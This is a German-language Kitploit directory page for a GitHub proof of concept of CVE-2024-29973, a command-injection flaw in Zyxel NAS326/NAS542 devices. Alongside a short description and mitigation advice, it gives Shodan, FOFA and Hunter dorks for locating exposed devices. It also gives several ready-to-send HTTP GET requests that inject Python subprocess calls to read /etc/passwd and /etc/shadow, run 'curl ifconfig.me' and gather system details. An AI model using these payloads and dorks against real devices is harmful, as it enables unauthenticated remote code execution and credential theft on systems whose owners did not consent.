Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-29973 | Kitploit
Tools/GitHubGitHub/kernel364/cve-2024-29973
Embedded-System-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffung
GitHubkernel364/cve-2024-29973

CVE-2024-29973

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-29973 – Sicherheitslücke zur Remote-Befehlsinjektion

Beschreibung

Bei CVE-2024-29973 handelt es sich um eine kritische Sicherheitslücke in bestimmten Netzwerkgeräten von Zyxel. Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Befehle auf dem Zielgerät auszuführen, indem unsachgemäße Mechanismen zur Eingabevalidierung in der Firmware ausgenutzt werden. Angreifer können speziell gestaltete HTTP-Anfragen an das Gerät senden, systemnahe Befehle einschleusen und möglicherweise die vollständige Kontrolle über das Gerät erlangen.

Dorks

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

Funktionsweise

Befehlsinjektion: Die Schwachstelle entsteht durch eine unzureichende Eingabebereinigung in einer der Weboberflächen des Geräts. Dieser Fehler ermöglicht es Angreifern, Betriebssystembefehle in Parameter von HTTP-Anfragen einzufügen.

Exploit-Beispiel: Angreifer können über eine HTTP-GET-Anfrage wie die folgende Befehle einschleusen, um beliebigen Code auszuführen:

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

Auswirkung: Eine erfolgreiche Ausnutzung führt zur Möglichkeit, Systembefehle auszuführen, was potenziell eine Fernsteuerung des Geräts, Datenlecks oder eine weitere Beeinträchtigung des Netzwerks zur Folge haben kann.

Vorbeugung

Um die mit dieser Schwachstelle verbundenen Risiken zu mindern, befolgen Sie diese Schritte:

Firmware-Update: Stellen Sie sicher, dass alle Zyxel-Geräte auf die neueste Firmware-Version aktualisiert werden. Zyxel hat Patches veröffentlicht, die diese Schwachstelle beheben. Prüfen Sie regelmäßig auf Updates und wenden Sie diese umgehend an.

Netzwerksegmentierung: Isolieren Sie anfällige Geräte von der kritischen Netzwerkinfrastruktur. Legen Sie nur notwendige Dienste offen und stellen Sie sicher, dass administrative Schnittstellen nicht öffentlich zugänglich sind.

Firewall-Konfiguration: Beschränken Sie ein- und ausgehenden Datenverkehr auf essenzielle Dienste. Blockieren Sie unnötigen HTTP-Zugriff auf Zyxel-Geräte.

Überwachung auf verdächtige Aktivitäten: Implementieren Sie Protokollierungs- und Überwachungstools, die ungewöhnliches Verhalten erkennen und warnen können, wie etwa wiederholte Anmeldeversuche oder abnormale Datenverkehrsmuster.

Referenzen National Vulnerability Database - CVE-2024-29973 Zyxel Security Advisory

Bilder

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
Tool herunterladen